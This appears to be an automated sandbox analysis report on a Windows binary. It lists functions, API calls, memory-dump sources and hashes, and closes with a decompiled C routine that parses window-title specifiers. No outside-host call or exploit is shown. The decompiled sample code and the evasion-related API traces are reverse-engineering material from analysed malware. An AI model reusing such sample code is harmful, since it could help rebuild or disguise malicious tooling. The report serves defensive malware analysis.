                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                            • String ID:
                            • API String ID: 2427264223-0
                            • Opcode ID: a5c99c9409ad8ae114e420f1dfe561036ff177610d78f49c7cef060b75a47488
                            • Instruction ID: 118b7d8a4b45be0b41023ea3c32d9e51a29b48a0661c406692177a77ae770dc4
                            • Opcode Fuzzy Hash: a5c99c9409ad8ae114e420f1dfe561036ff177610d78f49c7cef060b75a47488
                            • Instruction Fuzzy Hash: 22B09B314001487FCB052F11ED0E84D3F55DB81350B504014F51507071DF719F519584
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9B650, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 65c8b29cfe20d1a1b9703d389f1749600054ef56cfc0e6daeab24083c662b62e
                            • Instruction ID: 353e3e0128815b63224ab2df45970f885887d8131923cc20efd1443cdf4d3960
                            • Opcode Fuzzy Hash: 65c8b29cfe20d1a1b9703d389f1749600054ef56cfc0e6daeab24083c662b62e
                            • Instruction Fuzzy Hash: 09317375720301EBCF20EF68EB82E26B3E8AF51B50F244919E6058B251D735F894C7B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A93130, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 4876ffcba8482726e52f033019541679edb7f75d70a134971b61a7a71de6ff86
                            • Instruction ID: 4fd5274fd7c310e0824d8b9a67370415d1fa4500320bd0e58dc41f1b83afb7f1
                            • Opcode Fuzzy Hash: 4876ffcba8482726e52f033019541679edb7f75d70a134971b61a7a71de6ff86
                            • Instruction Fuzzy Hash: F5317E71E04208EBDF008FA6E9426EEFBF8FF40701F2085AAD855D6661F7399A90D740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A929B0, Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 6ac9a0767665f6ec0bfeda2068dbf66a3743561c5da31f046b74c89db8110748
                            • Instruction ID: f3f0b0c45a642d4e0393215edc2d5565faa53eba0ef93fd4bfbd7e53eac857fd
                            • Opcode Fuzzy Hash: 6ac9a0767665f6ec0bfeda2068dbf66a3743561c5da31f046b74c89db8110748
                            • Instruction Fuzzy Hash: 64316BBA600611EFCB24DF28C581A61F7E0FF09750B14C569D989CBB96E731EC52CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A931B0, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 019ee8ebf15400a281e4ec07302b3ea7c2cc7cd12908ddc18e5a78aae465cc8f
                            • Instruction ID: ba0548787a9e9fe0c9fed0310da55eff3ccf9f3e2627e04469c8c6c189e726c8
                            • Opcode Fuzzy Hash: 019ee8ebf15400a281e4ec07302b3ea7c2cc7cd12908ddc18e5a78aae465cc8f
                            • Instruction Fuzzy Hash: E2315E71B042059FCB24EF68C5819AAB3F5FF58304B20C55DE5968B352EB72EE51CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9E1B0, Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 00A9E248
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: 653ddb856882b804309c71ec9bd82961583d48af013e00df3c32506ca017f462
                            • Instruction ID: 2aaf8a679b57a321ef2bb4df8b6d32e2d501473b2fc9a0d440e8a20f6eabf8db
                            • Opcode Fuzzy Hash: 653ddb856882b804309c71ec9bd82961583d48af013e00df3c32506ca017f462
                            • Instruction Fuzzy Hash: 7D310D71B007059FCF28CF6DD98499AB7FAFB88710B15CA2EE45A87702D631F9458B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A93B40, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON
                            Download Yara Rule
                            APIs
                            • ReadFile.KERNEL32(00000000,?,00010000,?,00000000,?,?), ref: 00A93B92
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 73dea2c6e879bca241e67eef8e15ddd7d0c31787a692465c8c9532d2441ecd28
                            • Instruction ID: efde6d122abdc1f187837b6bcfccb73f1217ded6e0b542cafb2328738d6fa8e5
                            • Opcode Fuzzy Hash: 73dea2c6e879bca241e67eef8e15ddd7d0c31787a692465c8c9532d2441ecd28
                            • Instruction Fuzzy Hash: 0A11F576700B019FDF20CF55C894B67B7F8EB44750F10891EE59A87A50D770EA45CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AAF597, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,00AA12DC,00000000,?,00AA6A7F,?,00AA12DC,00000000,00000000,00000000,?,00AA793E,00000001,00000214,?,00AA12DC), ref: 00AAF5DA
                              • Part of subcall function 00AA7E9A: __getptd_noexit.LIBCMT ref: 00AA7E9A
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateHeap__getptd_noexit
                            • String ID:
                            • API String ID: 328603210-0
                            • Opcode ID: 525958e6159ff652a4b483861e09181a6c44601703f9fc429d41b55aaeb28dc2
                            • Instruction ID: 4e4aba3af068a80f80d651a2a88efec0656e1724792abb2fac34b23357cc7a29
                            • Opcode Fuzzy Hash: 525958e6159ff652a4b483861e09181a6c44601703f9fc429d41b55aaeb28dc2
                            • Instruction Fuzzy Hash: 4101DF366002169FEB2D9FA5DC54B6B3794AF83760F168939E816CB1E0EB70CC01C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A93250, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 5a15561e324f20b209c2c66c05fde8c1a2672573e3cfa11037fca088045765d4
                            • Instruction ID: 27f0b4b881278b78c131a7d6d9d78ad67c44ae5480a493475984242c70901d6d
                            • Opcode Fuzzy Hash: 5a15561e324f20b209c2c66c05fde8c1a2672573e3cfa11037fca088045765d4
                            • Instruction Fuzzy Hash: 58014C712006009FC724DF6CC942D27B3F4EF99744710886DE49AC7752EB32E801CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AFFD26, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _wcscpy
                            • String ID:
                            • API String ID: 3048848545-0
                            • Opcode ID: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
                            • Instruction ID: c973be0e98c10422b7f2e4e418a3e8a0954ee2b6dbeacf97cedd85f5ca406eda
                            • Opcode Fuzzy Hash: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
                            • Instruction Fuzzy Hash: 29F0EC772142183A9E10AFA5AC42CF7B79CEF97370710062BF6549B181E662754583F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9ECD0, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • CharUpperBuffW.USER32(?,?), ref: 00A9ED03
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: BuffCharUpper_malloc
                            • String ID:
                            • API String ID: 1573836695-0
                            • Opcode ID: f8d136ca888e38a67dfc1c723bd4f1c1c3d8f0a63a90b778dbb89741f05c0ff6
                            • Instruction ID: d7306345506bc2cb4e7ae24859c0982cfa016dd54c41c8e47c251bcc849cae76
                            • Opcode Fuzzy Hash: f8d136ca888e38a67dfc1c723bd4f1c1c3d8f0a63a90b778dbb89741f05c0ff6
                            • Instruction Fuzzy Hash: F7F0E7707006208BDF609F64A681666BBE4EF09B51F048199FC898F386C734DC01CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD3C1D, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 00AD3C38
                              • Part of subcall function 00AC3D83: EnumProcesses.PSAPI(?,00000800,?,?,00AD3C4D,?,?,?,00B38178), ref: 00AC3DA0
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: EnumProcesses_wcslen
                            • String ID:
                            • API String ID: 3303492691-0
                            • Opcode ID: 19273351108e3adbd430afc72650d43a403131b15a651397b3d0ef556c66ae99
                            • Instruction ID: fed3d78b33654f9e996467658db18a8bb94503aad0d953036d1def82098ac2f8
                            • Opcode Fuzzy Hash: 19273351108e3adbd430afc72650d43a403131b15a651397b3d0ef556c66ae99
                            • Instruction Fuzzy Hash: 3BE0E5739010143BDB11664ABC81ECF735CDBC2225F044067F60A97201A221AE4582F2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9D9C0, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • FindCloseChangeNotification.KERNEL32(?,?,00AB6F2F), ref: 00A9D9DD
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ChangeCloseFindNotification
                            • String ID:
                            • API String ID: 2591292051-0
                            • Opcode ID: 36b8a0464e9455edd393f056b7540ffe691c8e8d1d1db4ef2d70a4d799b911fb
                            • Instruction ID: d56803cf3b45e710b4e748a9e4861429113d70d6ce610d3bcd2a89c0fc9d7758
                            • Opcode Fuzzy Hash: 36b8a0464e9455edd393f056b7540ffe691c8e8d1d1db4ef2d70a4d799b911fb
                            • Instruction Fuzzy Hash: 24E04EB4A00B009E87308F2AE444406FBF8AFE02213208E1FE4A6C2A64C3B4A1898F50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD3D3A, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                            Download Yara Rule
                            APIs
                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,00AB6340,?,00B17AAC,00000003,00A9E0B0,?,?,00000001), ref: 00AD3D58
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: e67edfd0f9a1dfceac73db3a767c50dbd114a4b1b78206d090883284da19b080
                            • Instruction ID: 4844a86ad3605b87a49e556d980ee4566833b1aa2cf552e2d60b7b194861c910
                            • Opcode Fuzzy Hash: e67edfd0f9a1dfceac73db3a767c50dbd114a4b1b78206d090883284da19b080
                            • Instruction Fuzzy Hash: 38E0EE76100218AFCB10DF98D844EDA77BCAF48760F00890AFA458B200C7B0AA908BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9E270, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 00A9E288
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: fb1ff88f946cb817592954d20d72571b72d45889b36c8ae1bd94409bbabc1b88
                            • Instruction ID: 04a58f8d95c737959593fc425a60bea4d7e6ca54596410b8a780940447fa9269
                            • Opcode Fuzzy Hash: fb1ff88f946cb817592954d20d72571b72d45889b36c8ae1bd94409bbabc1b88
                            • Instruction Fuzzy Hash: B0E01279600208BFC704DFA4DC45DAA7779E748601F008258FD01D7340D671AD5086A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA48E2, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __wfsopen
                            • String ID:
                            • API String ID: 197181222-0
                            • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                            • Instruction ID: b250e4d1656f499999971db3f812dd9ff9a674a29c3f3b35c3cc47ad1e37a7e8
                            • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                            • Instruction Fuzzy Hash: 60C09B7244014C77CF111942ED02F493F5997D5B60F144010FB1C191619677D56195D5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA17FA, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            APIs
                            • _doexit.LIBCMT ref: 00AA1806
                              • Part of subcall function 00AA16BA: __lock.LIBCMT ref: 00AA16C8
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __lock_doexit
                            • String ID:
                            • API String ID: 368792745-0
                            • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                            • Instruction ID: f67e7373258913ff4e7dbc1e79cf92cd012e95aec6c62f1fb546f834b9f41ce6
                            • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                            • Instruction Fuzzy Hash: EFB0923258420833DA202542AC07F063A1A87C1B60E280120BA0C1A1E1AAA2A9618089
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00AAA128, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                            Download Yara Rule
                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 00AB1EE1
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AB1EF6
                            • UnhandledExceptionFilter.KERNEL32(00B143DC), ref: 00AB1F01
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00AB1F1D
                            • TerminateProcess.KERNEL32(00000000), ref: 00AB1F24
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID:
                            • API String ID: 2579439406-0
                            • Opcode ID: 88dcf67dc51a64d376d3833f28936a836fda66b00f340f911e9b91a31513d744
                            • Instruction ID: 3afaad0fc162adb290587fdc0212e8a7d9cdacbd2f2a56536ef7e6326fe3c491
                            • Opcode Fuzzy Hash: 88dcf67dc51a64d376d3833f28936a836fda66b00f340f911e9b91a31513d744
                            • Instruction Fuzzy Hash: 0F2120B489A204DFD760DF64FD496443BA4FB0A301F90465AF90897371EFB99892CF19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF8322, Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 116COMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E00AF8322(void* __edx, void* __eflags, void* __fp0, intOrPtr* _a4) {
				char _v24;
				char _v40;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t35;
				void* _t37;
				void* _t39;
				char* _t53;
				void* _t61;
				void* _t62;
				intOrPtr* _t64;
				void* _t77;

				_t77 = __fp0;
				_t61 = __edx;
				E00A9BEC0( &_v24, __eflags);
				_t58 =  &_v40;
				E00A9BEC0( &_v40, __eflags);
				_t64 = _a4;
				if(E00AC4A5A(_t64) != 0 || E00AA13CB(_t62,  *_t64, L"LAST") == 0) {
					_t53 = L"[LAST";
					goto L14;
				} else {
					if(E00AA13CB(_t62,  *_t64, L"ACTIVE") != 0) {
						_t33 = E00AA333F( *_t64, L"HANDLE=", 7);
						__eflags = _t33;
						if(_t33 != 0) {
							_t35 = E00AA333F( *_t64, L"REGEXP=", 7);
							__eflags = _t35;
							if(_t35 != 0) {
								_t37 = E00AA333F( *_t64, L"CLASSNAME=", 0xa);
								__eflags = _t37;
								if(_t37 != 0) {
									_t39 = E00AA13CB(_t62,  *_t64, L"ALL");
									__eflags = _t39;
									if(_t39 == 0) {
										_t53 = L"[ALL";
										goto L14;
									}
								} else {
									E00A92390( &_v24, L"[CLASS:", _t61, _t62);
									_push(0xffffffff);
									_push(0xa);
									goto L10;
								}
							} else {
								E00A92390( &_v24, L"[REGEXPTITLE:", _t61, _t62);
								_push(0xffffffff);
								_push(7);
								goto L10;
							}
						} else {
							E00A92390( &_v24, L"[HANDLE:", _t61, _t62);
							_push(0xffffffff);
							_push(7);
							L10:
							_push( &_v56);
							_push(_t64);
							E00A9DE00( &_v40, E00AF125B(__eflags));
							_t58 =  &_v56;
							E00A92480( &_v56);
							E00AF106D(__eflags, _t77,  &_v40);
							E00A9BFA0( &_v24, _t77,  &_v40);
							_t64 = _a4;
							goto L15;
						}
					} else {
						_t53 = L"[ACTIVE";
						L14:
						E00A92390( &_v24, _t53, _t61, _t62);
						L15:
						E00A91DE0( &_v24, _t58, "]", _t77);
						E00A9DE00(_t64,  &_v24);
					}
				}
				E00A92480( &_v40);
				return E00A92480( &_v24);
			}


















                            0x00af8322
                            0x00af8322
